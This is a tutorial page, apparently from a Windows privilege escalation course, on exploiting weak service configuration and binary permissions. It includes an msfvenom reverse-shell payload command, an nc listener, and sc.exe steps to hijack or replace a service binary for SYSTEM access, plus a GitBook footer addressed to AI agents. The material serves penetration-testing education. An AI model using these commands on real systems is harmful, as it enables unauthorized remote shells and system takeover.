> For the complete documentation index, see [llms.txt](https://dev-angelist.gitbook.io/windows-privilege-escalation/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://dev-angelist.gitbook.io/windows-privilege-escalation/7-weak-service-permissions.md).
# 7 - Weak Service Permissions
#### Topics
> 1. Introduction to the Windows Shells
> 2. Windows Permissions
> 3. Reverse Shells in Windows
> 4. SeImpersonatePrivilege Exploitation
> 5. On Cross Compilation
> 6. Windows Services
> 7. Weak Service Permissions
> 8. Unquoted Service Path
> 9. DLL Hijacking
> 10. Always Install Elevated
> 11. Files with Sensitive Data
> 12. Windows Hashes
> 13. Stored Credentials and the Windows Vault
> 14. Scheduled Task
> 15. Critical Registry Paths
> 16. Useful Tools
> 17. AMSI Bypass
## **Weak Permissions on Service Configuration**
Weak service configurations and binaries present significant security risks, infact service configurations can be altered if a user or group has sufficient permissions.
**Viewing Service Configuration**
[simpleService.c](https://github.com/LeonardoE95/yt-en/blob/main/src/2024-10-27-windows-privesc-windows-services/content/simpleService.c)
Use the `sc.exe` command to check a service's configuration:
```powershell
sc.exe qc SimpleService
```
**Sample Output:**
```bash
SERVICE_NAME: SimpleService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\Quickemu\Downloads\simpleService.exe
SERVICE_START_NAME : LocalSystem
```
**Checking Permissions with AccessChk**
[AccessChk ](https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk)is a Microsoft utility that permits to know what kind of accesses specific users or groups have to resources including files, directories, Registry keys, global objects and Windows services. AccessChk quickly answers these questions with an intuitive interface and output. (Download it from [here](https://download.sysinternals.com/files/AccessChk.zip))
Than, using `accesschk64`we can verify permissions over a service:
```powershell
.\accesschk64.exe /accepteula -uwcqv SimpleService
```
**Sample Output:**
```bash
SimpleService
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
```
The output shows the permissions for users/groups. "SERVICE\_ALL\_ACCESS" indicates full control over the service as System and Administrators user.
After checking the configuration, the goal is to change the path and replace it with the malicious one, stop the service and run it again.
**Exploitation Steps**
1. **Create a Malicious Executable**\
Generate a reverse shell payload:
```bash
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe
```
2. **Modify the Service Executable Path**\
Change the `binpath` to point to the malicious binary:
```powershell
sc.exe config SimpleService binpath="C:\Users\Quickemu\Downloads\malicious.exe"
```
3. Go into listening mode with netcat on linux attacker machine (we'll obtain the connection after next step):
```bash
nc -lvnp 7777
```
4. **Restart the Service**\
Restart the service to execute the malicious binary:
```powershell
sc.exe stop SimpleService
sc.exe start SimpleService
```
***
## **Weak Permissions on Service Binary**
If the service binary itself has weak file permissions, it can be overwritten with a malicious executable.
**Identifying Service Binaries**
List the binary paths of running services:
```powershell
Get-CimInstance -ClassName win32_service | Select Name, State, PathName | Where-Object {$_.State -like 'Running'}
```
**Checking Binary Permissions with ICACLS**
Use the `icacls` utility to view file permissions:
```powershell
icacls .\simpleService.exe
```
**Sample Output:**
```plaintext
.\simpleService.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
QUICKEM-5QLQQP9\Quickemu:(F)
```
If the current user has "Full Control" (`(F)`), they can overwrite the binary.
**Exploitation Steps**
1. **Generate and Transfer a Malicious Binary**
```bash
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe
```
2. **Backup and Replace the Service Binary**
```powershell
cp .\simpleService.exe .\simpleService.exe.bkp
cp .\malicious.exe .\simpleService.exe
```
3. Go into listening mode with netcat on linux attacker machine (we'll obtain the connection after next step):
```bash
nc -lvnp 7777
```
4. **Restart the Service**
```powershell
sc.exe stop SimpleService
sc.exe start SimpleService
```
***
## **Service Enumeration with winPEAS**
`winPEAS` is a tool used to enumerate potential misconfigurations, including weak service permissions.
**Downloading winPEAS**
Download the binary:
```bash
wget https://github.com/peass-ng/PEASS-ng/releases/download/20241011-2e37ba11/winPEASx64.exe
```
**Running winPEAS to Enumerate Services**
Use the `servicesinfo` option to gather information about services:
```powershell
.\winPEASx64.exe quiet servicesinfo
```
`winPEAS` will display information about services, including configuration details, permissions, and potential vulnerabilities.
## Other Resources
* Windows Privilege Escalation Awesome Scripts: [https://github.com/peass-ng/PEASS-ng/...](https://www.youtube.com/redirect?event=video_description\&redir_token=QUFFLUhqbTBSTXJJMHdqTEpYQWV3Z3A3MF9HcmVFLUY4QXxBQ3Jtc0tsVmd1Qjh1NENMU2xYQjVpMHRjVzd4UmNFVzdkU1d6NzdhLV9IWERvLUlCVGR4QUU5NS1ScU9RdHBFaW5qRlZMbXczTkVqNXNxUG9kTUhBSzMwQVFwMmJQRk1iYkNDT2ZFUFl1d2h6TU8wU191TjM0UQ\&q=https%3A%2F%2Fgithub.com%2Fpeass-ng%2FPEASS-ng%2Ftree%2Fmaster%2FwinPEAS\&v=8sLagxX4OVs)
* Weak Service Permissions: [https://www.ired.team/offensive-secur...](https://www.youtube.com/redirect?event=video_description\&redir_token=QUFFLUhqbXdxU21zZHB3SVA1S20wMjViWmgxZWZuMDFRd3xBQ3Jtc0treTMxUDVDanVpN0xVS24zWTFUTWRDVUJyLUxaRHZWRElHT1pmUThCalFYSzBzTWVCMGNENFhQSHhGQk9kSDZuUm9UR0F2Wl9iNmZIUnQwNEVDZ0hBYTVQbG9JQWx6OVk1T1Bxci1pZmFBalNncGlpSQ\&q=https%3A%2F%2Fwww.ired.team%2Foffensive-security%2Fprivilege-escalation%2Fweak-service-permissions\&v=8sLagxX4OVs)
* Windows local privilege escalation: [https://xorond.com/posts/2021/04/wind...](https://www.youtube.com/redirect?event=video_description\&redir_token=QUFFLUhqbUU1RTV6UEZLZmNYTVBOSmhJdE1MdXIzMmpMZ3xBQ3Jtc0ttbDdVU3drNzg2SmFTRkZHdHg1bXJBakdaamR2TjFsNnFVYy13Y0tnbkhnSjc4dnhLWHlEbzJJY0dxT0pac0ZvTEZBVG1veUwxQXZhVGZNRE1GSnYwV21mV0t2SEVXYUk1MHdYZENpdlJ0V0U3WFVUWQ\&q=https%3A%2F%2Fxorond.com%2Fposts%2F2021%2F04%2Fwindows-local-privilege-escalation%2F\&v=8sLagxX4OVs)
* Service Misconfiguration: [https://www.narycyber.com/posts/privi...](https://www.youtube.com/redirect?event=video_description\&redir_token=QUFFLUhqbkYyUWZYWEg5aHlDa2NKcWVkZFJSbHgtVnVmQXxBQ3Jtc0ttYi1Ydk1EdGJHOW5Zc05vUzhvNUZTUW9YOGRSZU5Hd3k1WjN5NWZCQTA2VUFCM2J3cVFMaDBXbnlGS2F6cm1FLTJPTk1Dd1RvZTFneDRpZVlTMDlVa2VVNmhLUy1GS1N3YU10NkZ3YU9mcnl5cGNkcw\&q=https%3A%2F%2Fwww.narycyber.com%2Fposts%2Fprivilege-escalation%2Fwindows%2Fservice-misconfigurations%2F\&v=8sLagxX4OVs)
* Weak Service Permissions: [https://juggernaut-sec.com/weak-servi...](https://www.youtube.com/redirect?event=video_description\&redir_token=QUFFLUhqbnhBTHVhR2Q3VjgwcU1XNXZRc1o0bWpxRmFBZ3xBQ3Jtc0tramlMNkRYdXlwdmtCM1lSdXdQbG1FWUhZREQ5VlBTQm5GRkNwNnB1bFZ5M3lWWGhnWlF3Uk1sZThOR0pvdUhEenByYncwbnVTQmRQRHhnaDA5TWZNN21MVFNDWEVVdEJEZzZ5NlJJV0pzcXY1Q1hLZw\&q=https%3A%2F%2Fjuggernaut-sec.com%2Fweak-service-permissions-windows-privilege-escalation%2F\&v=8sLagxX4OVs)
* Insecure Service Permissions: [https://akimbocore.com/article/privil...](https://www.youtube.com/redirect?event=video_description\&redir_token=QUFFLUhqbF8xNTBtMVZhRUFkR2xVOW1lV3kwOE8wb3prUXxBQ3Jtc0tuSE4zOUF4dGpuMVdRVDNRTnJwX2RoZmlQX0Z5dnhaUm00U2ZTQmJNX0R1a05WVEhvRVItMFFieGQxZ3VyU1AtTGcySXlVbGlpSUZrMDh0eHhLVnpsU2VHSnRDRFZKQlRGNDQ1TmNPcjlxLXNsNUpncw\&q=https%3A%2F%2Fakimbocore.com%2Farticle%2Fprivilege-escalation-insecure-service-permissions%2F\&v=8sLagxX4OVs)
{% hint style="danger" %}
**Disclaimer**
**❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!**❗
{% endhint %}
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://dev-angelist.gitbook.io/windows-privilege-escalation/7-weak-service-permissions.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.